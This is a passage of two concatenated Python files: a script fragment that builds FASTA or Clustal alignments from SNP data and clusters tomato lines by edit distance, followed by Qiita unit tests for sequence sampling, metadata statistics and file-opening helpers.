dst = cols[4]
spps = cols[9].split("|")
if lastChro != chro:
print chro
if lastChro is not None:
if inchr is not None:
if inchr != lastChro:
print "reading data :: %s :: %s :: skipping exporting" % (runName, lastChro)
lastChro = chro
continue
else:
finalChro = True
parse(config, refs, lastChro)
if finalChro: break
print "reading data :: %s :: %s :: empting" % (runName, lastChro)
refs = []
lastChro = chro
lastPos = -1
numSnps = -1
for spp in config['sources']:
config['sources'][spp] = []
if chro in config['ignore' ]:
continue
if lastPos != posi:
if numSnps % 100000 == 0:
print "reading data :: %s :: %s %12d" % (runName, chro, numSnps)
numSnps += 1
lastPos = posi
if ( inchr is not None ):
if ( inchr != chro ) :
#sys.stdout.write(".")
continue
if ( instart is not None ) and ( posi < instart ):
#sys.stdout.write("<")
#print "%d<%d" % (posi, instart),
continue
if ( inend is not None ) and ( posi > inend ):
#sys.stdout.write(">")
#print "%d>%d" % (posi, instart),
continue
if lastPosVal != posi:
if numSnpsVal % 1000 == 0:
print "reading data :: %s :: %s %12d valid" % (runName, chro, numSnpsVal)
numSnpsVal += 1
for spp in config['sources']:
config['sources'][spp].append(None)
refs.append(src)
lastPosVal = posi
for spp in spps:
config['sources'][spp][numSnps] = dst
config['coords' ].add( posi )
#print '.',
if ( inchr is None ) or ( inchr == lastChro ):
parse(config, refs, lastChro)
if config['oufhd'] is not None:
config['oufhd'].write('\n\n')
config['oufhd'].close()
config['oufhd'] = None
print "reading data :: %s :: finished" % runName
return 0
def parse(config, refs, chro):
"""
Export alignment either in FASTA or ALN (clustal)
"""
print " exporting: chro %s" % chro
sources = config['sources']
names = config['names' ]
for spp in sources:
#print " parsing %s :: %s" % (chro, spp)
poses = sources[spp]
for pos in xrange(len(poses)):
nuc = poses[pos]
if nuc is None:
nuc = refs[pos]
poses[pos] = nuc
sourcesStrs = {}
for spp in names:
sourcesStrs[spp] = "".join( sources[spp] )
refsStrs = "".join( refs )
emptyStr = "N"*len(sourcesStrs[spp])
if config[ 'RIL' ]:
print 'RIL'
refsStrs, sourcesStrs, emptyStr = RIL( config, refsStrs, sourcesStrs, emptyStr )
if config['format'] == 'aln':
for frag in xrange(0, len(refs), 60):
#print frag,
if config['noref' ]:
refsfrag = refsStrs[frag:frag+60]
printfilealn( config, config['refname'], refsfrag, chro )
for spp in sorted( sourcesStrs ):
poses = sourcesStrs[spp]
posesfrag = poses[frag:frag+60]
sppname = fixsppname( spp )
printfilealn( config, sppname, posesfrag, chro )
config['oufhd'].write('\n\n')
elif config['format'] == 'fasta':
for spp in sorted( sourcesStrs ):
sppname = fixsppname( spp )
poses = sourcesStrs[spp]
printfilefasta(config, sppname, poses , chro)
if config['noref' ]:
printfilefasta(config, config['refname'], refsStrs, chro)
printfilecoords(config, chro)
if config['oufhd'] is not None:
config['oufhd'].write('\n\n')
config['oufhd'].close()
config['oufhd'] = None
def RIL( config, refsStrs, sourcesStrs, emptyStr ):
high, low, valids, invalids = config[ 'grouper' ]( config, refsStrs, sourcesStrs, emptyStr )
#valids, invalids = filterSimilarity( valids, invalids, config, refsStrs, sourcesStrs, emptyStr )
refsStrs, sourcesStrs, emptyStr = filter( high, low, valids, invalids, config, refsStrs, sourcesStrs, emptyStr )
return ( refsStrs, sourcesStrs, emptyStr )
def grouper_median( config, refsStrs, sourcesStrs, emptyStr ):
distMatrix = {}
mindist = sys.maxint
maxdist = 0
dists = []
# CALCULATE PAIRWISE, MIN AND MAX DISTANCES
sourceskeys = sourcesStrs.keys()
for spp1 in sourceskeys:
#print "spp1", spp1p, spp1n
spp1seq = sourcesStrs[ spp1 ]
dist = editdist.distance( refsStrs, spp1seq )
if dist > 0:
dists.append( dist )
distMatrix[ spp1 ] = dist
if dist < mindist:
mindist = dist
if dist > maxdist:
maxdist = dist
dists.sort()
print 'MIN DIST ', mindist
print 'MAX DIST ', maxdist
print 'DISTS ', len(dists), " ".join(["%3d" % x for x in dists])
median = dists[ int((len(dists) / 2) + 0.5) ]
vals = [ x for x in dists if x <= median ]
print 'MEDIAN ', median
delta = maxdist - median
print 'DELTA ', delta
threshold_low = mindist + delta
threshold_hig = median - delta
print 'THRESHOLD LOW ', threshold_low
print 'THRESHOLD HIGH', threshold_hig
good_low = [ k for k in distMatrix if distMatrix[k] <= threshold_low ]
good_hig = [ k for k in distMatrix if distMatrix[k] >= threshold_hig ]
invalids = [ k for k in distMatrix if distMatrix[k] > threshold_low and distMatrix[k] < threshold_hig ]
valids = good_low + good_hig
good_low.sort()
good_hig.sort()
invalids.sort()
valids.sort()
print 'GOOD LOW ', len(good_low), good_low
print 'GOOD HIGH ', len(good_hig), good_hig
print 'INVALIDS ', len(invalids), invalids
print 'VALIDS ', len(valids ), valids
#print 'DISTS ', len(dists), " ".join(["%3d" % x for x in dists])
#
#median_global = dists[ int((len(dists) / 2) + 0.5) ]
#vals_low = [ x for x in dists if x <= median_global ]
#vals_hig = [ x for x in dists if x > median_global ]
#
#print 'MEDIAN GLOBAL ', median_global
#print 'VALS LOW ', len(vals_low), " ".join(["%3d" % x for x in vals_low])
#print 'VALS HIGH ', len(vals_hig), " ".join(["%3d" % x for x in vals_hig])
#
#median_low = vals_low[ int((len(vals_low) / 2) + 0.5) ]
#median_hig = vals_hig[ int((len(vals_hig) / 2) + 0.5) ]
#
#print 'MEDIAN LOW ', median_low
#print 'MEDIAN HIGH ', median_hig
#
#delta_low = median_low - mindist
#delta_hig = maxdist - median_hig
#
#print 'DELTA LOW ', delta_low
#print 'DELTA HIGH ', delta_hig
#
#threshold_low = median_low + delta_low
#threshold_hig = median_hig - delta_hig
#
#print 'THRESHOLD LOW ', threshold_low
#print 'THRESHOLD HIGH', threshold_hig
#
#good_low = [ k for k in distMatrix if distMatrix[k] <= median_low ]
#good_hig = [ k for k in distMatrix if distMatrix[k] >= median_hig ]
#bad = [ k for k in distMatrix if distMatrix[k] > median_low and distMatrix[k] < median_hig ]
#
#print 'GOOD LOW ', len(good_low), good_low
#print 'GOOD HIGH ', len(good_hig), good_hig
#print 'BAD ', len(bad ), bad
return ( good_hig, good_low, valids, invalids )
def grouper_linkage( config, refsStrs, sourcesStrs, emptyStr ):
#entropy_cutoff = config[ 'RILentro' ]
#
##print "len names", len(names)
#model = bioMixture.getModel(3, len(refsStrs))
##print model
#sourcesKeys = sourcesStrs.keys()
#dataset = [list(sourcesStrs[x]) for x in sourcesKeys ]
##print dataset
#data = mixture.DataSet()
#data.fromList( dataset, IDs=sourcesKeys )
##print data
#model.EM(data, 40, entropy_cutoff)
#c = model.classify( data, labels=sourcesKeys, entropy_cutoff=entropy_cutoff )#, silent=1)
#print len(c), c
#clusters = defaultdict( list )
#for spppos, clusternum in enumerate(c):
# clusters[ clusternum ].append( sourcesKeys[ spppos ] )
#
#for key in clusters:
# spps = clusters[ key ]
#
# dists = []
# for x in range(1, len(spps)):
# dists.append( editdist.distance( sourcesStrs[ spps[0] ], sourcesStrs[ spps[x] ] ) )
# print 'key', key, 'dists', dists
tolerance = config[ 'RILmads' ]
distMatrix = {}
mindist = sys.maxint
maxdist = 0
# CALCULATE PAIRWISE, MIN AND MAX DISTANCES
sourceskeys = sourcesStrs.keys()
for spp1p, spp1n in enumerate( sourceskeys ):
#print "spp1", spp1p, spp1n
for spp2n in sourceskeys[spp1p+1:]:
#print " spp2", sourceskeys.index(spp2n), spp2n
sppKey = tuple(set(sorted( [ spp1n, spp2n ] )))
dist = editdist.distance( sourcesStrs[ spp1n ], sourcesStrs[ spp2n ] )
#print " sppKey", sppKey, 'dist', dist
distMatrix[ sppKey ] = dist
if dist < mindist:
mindist = dist
if dist > maxdist:
maxdist = dist
# CALCULATE DELTA OF DISTANCE FOR SCALE
deltadist = (maxdist - mindist) * 1.0
print 'min', mindist, 'max', maxdist, 'delta', deltadist
# NORMALIZE THE DATA
for sppKey in distMatrix:
#print "norma %-60s %4d" % ( str(sppKey), distMatrix[ sppKey ] ),
if deltadist == 0:
distMatrix[ sppKey ] = 1.0
else:
distMatrix[ sppKey ] = ( distMatrix[ sppKey ] - mindist ) / deltadist # convert to percentage
#print "%.4f" % distMatrix[ sppKey ]
# SEPARATE IN TWO GROUPS: REFERENCE (d<0.5) AND WILD (d>=0.5)
tolvalsmin = []
tolvalsmax = []
for sppKey in distMatrix:
spp1 = sppKey[ 0 ]
spp2 = sppKey[ 1 ]
dist = distMatrix[ sppKey ]
if dist >= 0.5:
tolvalsmax.append( dist )
else:
tolvalsmin.append( dist )
tolvalsmin.sort()
tolvalsmax.sort()
# CALCULATE MIDPOINTS FOR EACH GROUP TO CALCULATE MEDIAN
#print 'tol vals', tolvals
tolvalsminmidpoint = int( (len(tolvalsmin) / 2) + 0.5)
tolvalsmaxmidpoint = int( (len(tolvalsmax) / 2) + 0.5)
print 'tol val min midpoint', tolvalsminmidpoint, 'tol val min len', len( tolvalsmin )
print 'tol val max midpoint', tolvalsmaxmidpoint, 'tol val max len', len( tolvalsmax )
# CALCULATE MEDIAN FOR EACH GROUP
tolvalsminmedian = tolvalsmin[ tolvalsminmidpoint ]
tolvalsmaxmedian = tolvalsmax[ tolvalsmaxmidpoint ]
print "dist min median", tolvalsminmedian
print "dist max median", tolvalsmaxmedian
# CALCULATE MAD
tolvalsminMADs = [ abs(x - tolvalsminmedian) for x in tolvalsmin ]
tolvalsmaxMADs = [ abs(x - tolvalsmaxmedian) for x in tolvalsmax ]
tolvalsminMADs.sort()
tolvalsmaxMADs.sort()
#for y, x in enumerate(tolvalsmin):
# print 'min pos %4d val %.5f diff %.5f' % ( y, x, abs(x - tolvalsminmedian) )
#for y, x in enumerate(tolvalsmax):
# print 'max pos %4d val %.5f diff %.5f' % ( y, x, abs(x - tolvalsmaxmedian) )
#print 'tol mads', tolMADs
tolvalsminMAD = tolvalsminMADs[ tolvalsminmidpoint ]
tolvalsmaxMAD = tolvalsmaxMADs[ tolvalsmaxmidpoint ]
print 'MAD min before', tolvalsminMAD
print 'MAD max before', tolvalsmaxMAD
print 'tolerance ', tolerance
if tolerance > 0:
tolvalsminMAD = tolvalsminMAD * tolerance
tolvalsmaxMAD = tolvalsmaxMAD * tolerance
print 'MAD min tolerance', tolvalsminMAD
print 'MAD max tolerance', tolvalsmaxMAD
tolvalsmaxMAD = 1 - tolvalsmaxMAD
print 'MAD min final', tolvalsminMAD
print 'MAD max final', tolvalsmaxMAD
# DEFINE WHICH INDIVIDUALS PASS THRESHOLD OF SIMILARITY
setsSim = defaultdict( set )
setsDis = defaultdict( set )
for sppKey in distMatrix:
spp1 = sppKey[ 0 ]
spp2 = sppKey[ 1 ]
dist = distMatrix[ sppKey ]
#print "%.4f" % distMatrix[ sppKey ],
if dist <= tolvalsminMAD:
setsSim[ spp1 ].add( spp2 )
setsSim[ spp2 ].add( spp1 )
#print '+'
elif dist >= tolvalsmaxMAD:
setsDis[ spp1 ].add( spp2 )
setsDis[ spp2 ].add( spp1 )
#print '-'
else:
#print
pass
print 'len sim', len(setsSim), 'dis', len(setsDis)
similar = set()
dissimilar = set()
# GENERATE FINAL LISTS
# LIST OF SIMILAR TO REFERENCE
for spp in setsSim:
sppset = setsSim[ spp ]
#print "spp SIM %-30s %s" % ( spp, str( sppset ) )
similar = similar.union( sppset )
# LIST OF DISSIMILAR TO REFERENCE
for spp in setsDis:
sppset = setsDis[ spp ]
#print "spp DIS %-30s %s" % ( spp, str( sppset ) )
dissimilar = dissimilar.union( sppset )
# MERGE SIMILAR AND DISSIMILAR LISTS INTO VALID LIST
# ADD REMAINING SPECIES INTO INVALID SPECIES
shared = dissimilar.intersection( similar )
simonly = similar.difference( dissimilar )
disonly = dissimilar.difference( similar )
valids = set().union(similar, dissimilar)
invalids = set(sourceskeys).difference(valids)
print "Similar ", len(sorted(list( similar ))), sorted(list( similar ))
print "Disimilar", len(sorted(list( dissimilar ))), sorted(list( dissimilar ))
print
print "Shared ", len(sorted(list( shared ))), sorted(list( shared ))
print "Sim Only ", len(sorted(list( simonly ))), sorted(list( simonly ))
print "Dis Only ", len(sorted(list( disonly ))), sorted(list( disonly ))
print
print "Valids ", len(sorted(list( valids ))), sorted(list( valids ))
print "Invalids ", len(sorted(list( invalids ))), sorted(list( invalids ))
#Similar 31 ['609', '610', '612', '614', '615', '623', '634', '644', '649', '651', '654', '660', '665', '666', '667', '668', '670', '674', '676', '679', '685', '688', '692', '693', '694', '697', '702', '706', '710', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LYC2740']
#Disimilar 45 ['609', '610', '612', '614', '615', '618', '623', '625', '626', '634', '644', '649', '651', '653', '654', '659', '660', '665', '666', '667', '668', '670', '674', '676', '679', '684', '685', '688', '691', '692', '693', '694', '696', '697', '702', '705', '706', '707', '710', '711', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LA1578', 'Spimpinellifolium LA1584', 'Spimpinellifolium LYC2740', 'Spimpinellifolium LYC2798']
#
#Shared 31 ['609', '610', '612', '614', '615', '623', '634', '644', '649', '651', '654', '660', '665', '666', '667', '668', '670', '674', '676', '679', '685', '688', '692', '693', '694', '697', '702', '706', '710', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LYC2740']
#Sim Only 0 []
#Dis Only 14 ['618', '625', '626', '653', '659', '684', '691', '696', '705', '707', '711', 'Spimpinellifolium LA1578', 'Spimpinellifolium LA1584', 'Spimpinellifolium LYC2798']
#
#Valids 45 ['609', '610', '612', '614', '615', '618', '623', '625', '626', '634', '644', '649', '651', '653', '654', '659', '660', '665', '666', '667', '668', '670', '674', '676', '679', '684', '685', '688', '691', '692', '693', '694', '696', '697', '702', '705', '706', '707', '710', '711', 'Slycopersicum MoneyMaker', 'Spimpinellifolium LA1578', 'Spimpinellifolium LA1584', 'Spimpinellifolium LYC2740', 'Spimpinellifolium LYC2798']
#Invalids 20 ['601', '603', '608', '611', '619', '622', '624', '630', '631', '639', '643', '646', '648', '656', '658', '669', '675', '678', '682', '701']
return ( sorted(list(dissimilar)), sorted(list(similar)), sorted(list( valids )), sorted(list( invalids)) )
def filterSimilarity( high, low, valids, invalids, config, refsStrs, sourcesStrs, emptyStr ):
minsim = config[ 'RILminsim' ]
# CALCULATE PERCENTAGE OF SIMILARITY TO REFERENCE
refsims = {}
for spp in valids:
sppseq = sourcesStrs[ spp ]
refsim = 0
for nucPos, nucSeq in enumerate( sppseq ):
refSeq = refsStrs[ nucPos ]
if refSeq == nucSeq:
refsim += 1
refsims[ spp ] = ( float( refsim ) / float( len( sppseq ) ) )
#print 'REF', refsStrs
#print 'ALT', altsStrs
# REPLACE SEQUENCES WITH EITHER REFERENCE OR ALTERNATIVE
modsCount = defaultdict( int )
for spp in sourcesStrs:
if spp in refsims:
if refsims[ spp ] > minsim:
modsCount[ 'REF' ] += 1
else:
modsCount[ 'ALT' ] += 1
invalids[ spp ] = valids[ spp ]
del valids[ spp ]
#for sppPos, sppNucs in enumerate( nucs ):
#print sppNucs, list(sppNucs), dict(sppNucs), sppNucs.values()
for key in modsCount:
print "count", key, modsCount[ key ]
print "count NNN", len( invalids )
return ( valids, invalids, config, refsStrs, sourcesStrs, emptyStr )
def filter( high, low, valids, invalids, config, refsStrs, sourcesStrs, emptyStr ):
greedy = config[ 'RILgreedy' ]
# IF IN GREEDY MODE, FIX NUCLEOTIDES FROM VALIDs
if greedy:
# COUNT NUCLEOTIDES IN EACH POSITION
nucs = []
for spp in sourcesStrs:
sppseq = sourcesStrs[ spp ]
for nucPos, nuc in enumerate( sppseq ):
if len( nucs ) <= nucPos:
nucs.append( Counter() )
nucs[ nucPos ].update( [ nuc ] )
# GENERATE ALTERNATIVE STRING
altsStrs = ""
refsStrsN = ""
emptyStr = ""
for nucPos, nucRef in enumerate( refsStrs ):
nucData = list( nucs[ nucPos ] )
if len( nucData ) != 2:
print "BAD BAD BAD SEQUENCE. MORE THAN TWO VARIANTES TO THE SAME POSITION", nucData
altsStrs += '-'
refsStrsN += '-'
emptyStr += '-'
else:
#print 'pos %3d data %-10s ref %s' % ( nucPos, str(nucData), nucRef ),
nucData.remove( nucRef )
nucAlt = nucData[0]
#print 'alt', nucAlt
altsStrs += nucAlt
refsStrsN += nucRef
emptyStr += 'N'
refsStrs = refsStrsN
for spp in sourcesStrs:
if spp in low:
sourcesStrs[ spp ] = refsStrs
#print " fixing spp %-30s to REF" % ( spp )
#print " fixing spp %-30s to ALT" % ( spp )
#sourcesStrs[ spp ] = refsStrs
#sourcesStrs[ spp ] = altsStrs
elif spp in high:
sourcesStrs[ spp ] = altsStrs
if config['RILdelete']:
for spp in sourcesStrs.keys():
#sppseq = sourcesStrs[spp]
#= "".join( sources[spp] )
if spp in invalids:
#print "spp", spp, 'is invalid. converting to NNN'
del sourcesStrs[spp]
# CONVERT UNCLUSTERED SEQUENCES TO N
for spp in sourcesStrs:
#sppseq = sourcesStrs[spp]
#= "".join( sources[spp] )
if spp in invalids:
#print "spp", spp, 'is invalid. converting to NNN'
sourcesStrs[spp] = emptyStr
return refsStrs, sourcesStrs, emptyStr
def printfilename(config, chro, coords=False):
inchr = config['inchr' ]
instart = config['instart']
inend = config['inend' ]
posstr = ''
if (instart is not None) or (inend is not None):
if (instart is not None) and (inend is not None):
posstr = '_%06d-%06d' % (instart, inend)
elif (instart is not None):
posstr = '_%06d-end' % (instart)
elif (inend is not None):
posstr = '_000000-%06d' % (inend)
ext = '.aln'
if config['format'] == 'fasta':
ext = '.fasta'
if coords:
ext += '.coords'
outfile = config['infile'] + '.' + chro + posstr + ext
return outfile
def printfileopen(config, spp, chro, header=None):
"""
Save to file
"""
if config['ouchr'] != chro:
print " printing aln chromosome '%s'" % chro
if config['oufhd'] is not None:
config['oufhd'].write('\n\n')
config['oufhd'].close()
config['oufhd'] = None
config['ouchr'] = chro
outfile = printfilename(config, chro)
if config['oufhd'] is None:
print " opening %s" % outfile
config['oufhd'] = open(outfile, 'w')
if header is not None:
config['oufhd'].write(header)
def printfilealn(config, spp, line, chro):
"""
Print alignment header
"""
printfileopen(config, spp, chro, header='CLUSTAL multiple sequence alignment\n\n\n')
config['oufhd'].write(config['sppmaxlength'] % spp)
config['oufhd'].write(line)
config['oufhd'].write("\n")
def printfilefasta(config, spp, line, chro):
"""
Print fasta header
"""
printfileopen(config, spp, chro)
config['oufhd'].write('>' + spp + "\n")
for frag in xrange(0, len(line), 60):
config['oufhd'].write(line[frag:frag+60])
config['oufhd'].write("\n")
config['oufhd'].write("\n")
def printfilecoords(config, chro):
outfile = printfilename(config, chro, coords=True)
print "exporting coords to %s" % outfile
coords = config['coords' ]
with open(outfile, 'w') as fhd:
fhd.write( str( len( coords ) ) )
fhd.write( "\n" )
fhd.write( "|".join( [ str(x) for x in sorted(coords) ] ) )
if __name__ == '__main__':
main(sys.argv[1:])
|
|
#!/usr/bin/env python
from __future__ import division
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
import os
from unittest import TestCase, main
import tempfile
import h5py
import numpy as np
from future.utils.six import StringIO, BytesIO
from qiita_db.metadata_template import SampleTemplate, PrepTemplate
from qiita_ware.util import (per_sample_sequences, stats_from_df, open_file,
_is_string_or_bytes)
def mock_sequence_iter(items):
return ({'SequenceID': sid, 'Sequence': seq} for sid, seq in items)
class UtilTests(TestCase):
def setUp(self):
np.random.seed(123)
def test_per_sample_sequences_simple(self):
max_seqs = 10
# note, the result here is sorted by sequence_id but is in heap order
# by the random values associated to each sequence
exp = sorted([('b_2', 'AATTGGCC-b2'),
('a_5', 'AATTGGCC-a5'),
('a_1', 'AATTGGCC-a1'),
('a_4', 'AATTGGCC-a4'),
('b_1', 'AATTGGCC-b1'),
('a_3', 'AATTGGCC-a3'),
('c_3', 'AATTGGCC-c3'),
('a_2', 'AATTGGCC-a2'),
('c_2', 'AATTGGCC-c2'),
('c_1', 'AATTGGCC-c1')])
obs = per_sample_sequences(mock_sequence_iter(sequences), max_seqs)
self.assertEqual(sorted(obs), exp)
def test_per_sample_sequences_min_seqs(self):
max_seqs = 10
min_seqs = 3
# note, the result here is sorted by sequence_id but is in heap order
# by the random values associated to each sequence
exp = sorted([('a_5', 'AATTGGCC-a5'),
('a_1', 'AATTGGCC-a1'),
('a_4', 'AATTGGCC-a4'),
('a_3', 'AATTGGCC-a3'),
('c_3', 'AATTGGCC-c3'),
('a_2', 'AATTGGCC-a2'),
('c_2', 'AATTGGCC-c2'),
('c_1', 'AATTGGCC-c1')])
obs = per_sample_sequences(mock_sequence_iter(sequences), max_seqs,
min_seqs)
self.assertEqual(sorted(obs), exp)
def test_per_sample_sequences_complex(self):
max_seqs = 2
exp = sorted([('b_2', 'AATTGGCC-b2'),
('b_1', 'AATTGGCC-b1'),
('a_2', 'AATTGGCC-a2'),
('a_3', 'AATTGGCC-a3'),
('c_1', 'AATTGGCC-c1'),
('c_2', 'AATTGGCC-c2')])
obs = per_sample_sequences(mock_sequence_iter(sequences), max_seqs)
self.assertEqual(sorted(obs), exp)
def test_stats_from_df(self):
obs = stats_from_df(SampleTemplate(1).to_dataframe())
for k in obs:
self.assertEqual(obs[k], SUMMARY_STATS[k])
def test_dataframe_from_template(self):
template = PrepTemplate(1)
obs = template.to_dataframe()
# 27 samples
self.assertEqual(len(obs), 27)
self.assertTrue(set(obs.index), {
u'SKB1.640202', u'SKB2.640194', u'SKB3.640195', u'SKB4.640189',
u'SKB5.640181', u'SKB6.640176', u'SKB7.640196', u'SKB8.640193',
u'SKB9.640200', u'SKD1.640179', u'SKD2.640178', u'SKD3.640198',
u'SKD4.640185', u'SKD5.640186', u'SKD6.640190', u'SKD7.640191',
u'SKD8.640184', u'SKD9.640182', u'SKM1.640183', u'SKM2.640199',
u'SKM3.640197', u'SKM4.640180', u'SKM5.640177', u'SKM6.640187',
u'SKM7.640188', u'SKM8.640201', u'SKM9.640192'})
self.assertTrue(set(obs.columns), {
u'tot_org_carb', u'common_name', u'has_extracted_data',
u'required_sample_info_status', u'water_content_soil',
u'env_feature', u'assigned_from_geo', u'altitude', u'env_biome',
u'texture', u'has_physical_specimen', u'description_duplicate',
u'physical_location', u'latitude', u'ph', u'host_taxid',
u'elevation', u'description', u'collection_timestamp',
u'taxon_id', u'samp_salinity', u'host_subject_id', u'sample_type',
u'season_environment', u'temp', u'country', u'longitude',
u'tot_nitro', u'depth', u'anonymized_name', u'target_subfragment',
u'sample_center', u'samp_size', u'run_date', u'experiment_center',
u'pcr_primers', u'center_name', u'barcodesequence', u'run_center',
u'run_prefix', u'library_construction_protocol', u'emp_status',
u'linkerprimersequence', u'experiment_design_description',
u'target_gene', u'center_project_name', u'illumina_technology',
u'sequencing_meth', u'platform', u'experiment_title',
u'study_center'})
class TestFilePathOpening(TestCase):
"""Tests adapted from scikit-bio's skbio.io.util tests"""
def test_is_string_or_bytes(self):
self.assertTrue(_is_string_or_bytes('foo'))
self.assertTrue(_is_string_or_bytes(u'foo'))
self.assertTrue(_is_string_or_bytes(b'foo'))
self.assertFalse(_is_string_or_bytes(StringIO('bar')))
self.assertFalse(_is_string_or_bytes([1]))
def test_file_closed(self):
"""File gets closed in decorator"""
f = tempfile.NamedTemporaryFile('r')
filepath = f.name
with open_file(filepath) as fh:
pass
self.assertTrue(fh.closed)
def test_file_closed_harder(self):
"""File gets closed in decorator, even if exceptions happen."""
f = tempfile.NamedTemporaryFile('r')
filepath = f.name
try:
with open_file(filepath) as fh:
raise TypeError
except TypeError:
self.assertTrue(fh.closed)
else:
# If we're here, no exceptions have been raised inside the
# try clause, so the context manager swallowed them. No
# good.
raise Exception("`open_file` didn't propagate exceptions")
def test_filehandle(self):
"""Filehandles slip through untouched"""
with tempfile.TemporaryFile('r') as fh:
with open_file(fh) as ffh:
self.assertTrue(fh is ffh)
# And it doesn't close the file-handle
self.assertFalse(fh.closed)
def test_StringIO(self):
"""StringIO (useful e.g. for testing) slips through."""
f = StringIO("File contents")
with open_file(f) as fh:
self.assertTrue(fh is f)
def test_BytesIO(self):
"""BytesIO (useful e.g. for testing) slips through."""
f = BytesIO(b"File contents")
with open_file(f) as fh:
self.assertTrue(fh is f)
def test_hdf5IO(self):
f = h5py.File('test', driver='core', backing_store=False)
with open_file(f) as fh:
self.assertTrue(fh is f)
def test_hdf5IO_open(self):
name = None
with tempfile.NamedTemporaryFile(delete=False) as fh:
name = fh.name
fh.close()
h5file = h5py.File(name, 'w')
h5file.close()
with open_file(name) as fh_inner:
self.assertTrue(isinstance(fh_inner, h5py.File))
os.remove(name)
# comment indicates the expected random value
sequences = [
('a_1', 'AATTGGCC-a1'), # 2, 3624216819017203053
('a_2', 'AATTGGCC-a2'), # 5, 5278339153051796802
('b_1', 'AATTGGCC-b1'), # 4, 4184670734919783522
('b_2', 'AATTGGCC-b2'), # 0, 946590342492863505
('a_4', 'AATTGGCC-a4'), # 3, 4048487933969823850
('a_3', 'AATTGGCC-a3'), # 7, 7804936597957240377
('c_1', 'AATTGGCC-c1'), # 8, 8868534167180302049
('a_5', 'AATTGGCC-a5'), # 1, 3409506807702804593
('c_2', 'AATTGGCC-c2'), # 9, 8871627813779918895
('c_3', 'AATTGGCC-c3') # 6, 7233291490207274528
]
SUMMARY_STATS = {
'altitude': [('0.0', 27)],
'anonymized_name': [('SKB1', 1),
('SKB2', 1),
('SKB3', 1),
('SKB4', 1),
('SKB5', 1),
('SKB6', 1),
('SKB7', 1),
('SKB8', 1),
('SKB9', 1),
('SKD1', 1),
('SKD2', 1),
('SKD3', 1),
('SKD4', 1),
('SKD5', 1),
('SKD6', 1),
('SKD7', 1),
('SKD8', 1),
('SKD9', 1),
('SKM1', 1),
('SKM2', 1),
('SKM3', 1),
('SKM4', 1),
('SKM5', 1),
('SKM6', 1),
('SKM7', 1),
('SKM8', 1),
('SKM9', 1)],
'assigned_from_geo': [('n', 27)],
'barcodesequence': [('AACTCCTGTGGA', 1),
('ACCTCAGTCAAG', 1),
('ACGCACATACAA', 1),
('AGCAGGCACGAA', 1),
('AGCGCTCACATC', 1),
('ATATCGCGATGA', 1),
('ATGGCCTGACTA', 1),
('CATACACGCACC', 1),
('CCACCCAGTAAC', 1),
('CCGATGCCTTGA', 1),
('CCTCGATGCAGT', 1),
('CCTCTGAGAGCT', 1),
('CGAGGTTCTGAT', 1),
('CGCCGGTAATCT', 1),
('CGGCCTAAGTTC', 1),
('CGTAGAGCTCTC', 1),
('CGTGCACAATTG', 1),
('GATAGCACTCGT', 1),
('GCGGACTATTCA', 1),
('GTCCGCAAGTTA', 1),
('TAATGGTCGTAG', 1),
('TAGCGCGAACTT', 1),
('TCGACCAAACAC', 1),
('TGAGTGGTCTGT', 1),
('TGCTACAGACGT', 1),
('TGGTTATGGCAC', 1),
('TTGCACCGTCGA', 1)],
'center_name': [('ANL', 27)],
'center_project_name': [('None', 27)],
'collection_timestamp': [('2011-11-11 13:00:00', 27)],
'common_name': [('rhizosphere metagenome', 9),
('root metagenome', 9),
('soil metagenome', 9)],
'country': [('GAZ:United States of America', 27)],
'data_type_id': [('2', 27)],
'depth': [('0.15', 27)],
'description': [('Cannabis Soil Microbiome', 27)],
'description_duplicate': [('Bucu Rhizo', 3),
('Bucu Roots', 3),
('Bucu bulk', 3),
('Burmese Rhizo', 3),
('Burmese bulk', 3),
('Burmese root', 3),
('Diesel Rhizo', 3),
('Diesel Root', 3),
('Diesel bulk', 3)],
'dna_extracted': [('True', 27)],
'ebi_study_accession': [('None', 27)],
'ebi_submission_accession': [('None', 27)],
'elevation': [('114.0', 27)],
'emp_status': [('EMP', 27)],
'env_biome': [('ENVO:Temperate grasslands, savannas, and shrubland biome',
27)],
'env_feature': [('ENVO:plant-associated habitat', 27)],
'experiment_center': [('ANL', 27)],
'experiment_design_description': [('micro biome of soil and rhizosphere '
'of cannabis plants from CA', 27)],
'experiment_title': [('Cannabis Soil Microbiome', 27)],
'host_subject_id': [('1001:B1', 1),
('1001:B2', 1),
('1001:B3', 1),
('1001:B4', 1),
('1001:B5', 1),
('1001:B6', 1),
('1001:B7', 1),
('1001:B8', 1),
('1001:B9', 1),
('1001:D1', 1),
('1001:D2', 1),
('1001:D3', 1),
('1001:D4', 1),
('1001:D5', 1),
('1001:D6', 1),
('1001:D7', 1),
('1001:D8', 1),
('1001:D9', 1),
('1001:M1', 1),
('1001:M2', 1),
('1001:M3', 1),
('1001:M4', 1),
('1001:M5', 1),
('1001:M6', 1),
('1001:M7', 1),
('1001:M8', 1),
('1001:M9', 1)],
'host_taxid': [('3483', 27)],
'illumina_technology': [('MiSeq', 27)],
'latitude': [('0.291867635913', 1),
('3.21190859967', 1),
('4.59216095574', 1),
('10.6655599093', 1),
('12.6245524972', 1),
('12.7065957714', 1),
('13.089194595', 1),
('23.1218032799', 1),
('29.1499460692', 1),
('31.7167821863', 1),
('35.2374368957', 1),
('38.2627021402', 1),
('40.8623799474', 1),
('43.9614715197', 1),
('44.9725384282', 1),
('53.5050692395', 1),
('57.571893782', 1),
('60.1102854322', 1),
('63.6505562766', 1),
('68.0991287718', 1),
('68.51099627', 1),
('74.0894932572', 1),
('78.3634273709', 1),
('82.8302905615', 1),
('84.0030227585', 1),
('85.4121476399', 1),
('95.2060749748', 1)],
'library_construction_protocol': [('This analysis was done as in Caporaso '
'et al 2011 Genome research. The PCR '
'primers (F515/R806) were developed '
'against the V4 region of the 16S rRNA '
'(both bacteria and archaea), which we '
'determined would yield optimal '
'community clustering with reads of '
'this length using a procedure '
'similar to that of ref. 15. [For '
'reference, this primer pair amplifies '
'the region 533_786 in the Escherichia '
'coli strain 83972 sequence '
'(greengenes accession no. '
'prokMSA_id:470367).] The reverse PCR '
'primer is barcoded with a 12-base '
'error-correcting Golay code to '
'facilitate multiplexing of up '
'to 1,500 samples per lane, and both '
